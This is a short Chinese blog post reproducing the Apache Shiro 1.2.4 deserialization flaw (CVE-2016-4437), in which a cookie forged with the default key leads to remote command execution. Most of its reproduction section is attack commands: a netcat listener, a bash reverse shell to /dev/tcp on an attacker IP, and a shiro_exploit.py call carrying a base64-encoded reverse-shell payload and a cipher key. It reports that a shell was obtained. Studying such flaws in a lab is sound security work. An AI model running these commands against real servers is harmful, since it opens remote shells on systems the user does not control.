您的位置: 首页  >  文章  >  Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

分类: 文章 2023-11-21 19:36:52

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认**伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

1.搭建好环境

2.复现

http://目标IP:8080
在攻击机上运行nc 监听1234端口
nc -l -p 1234
反弹shell指令
bash -i >& /dev/tcp/攻击者IP/1234 0>&1
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)1. python shiro_exploit.py -u http://127.0.0.1:8080/
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)将其中的CipherKey放在-k中
其中-p命令中的命令http://www.jackson-t.ca/runtime-exec-payloads.html
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
python shiro_exploit.py -u http://ip:8080/ -t 3 -p “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHh4LzEyNzQgMD4mMQ==}|{base64,-d}|{bash,-i}” -k “kPH+bIxk5D2deZiIxcaaaA==”

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)成功反弹shell
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

相关推荐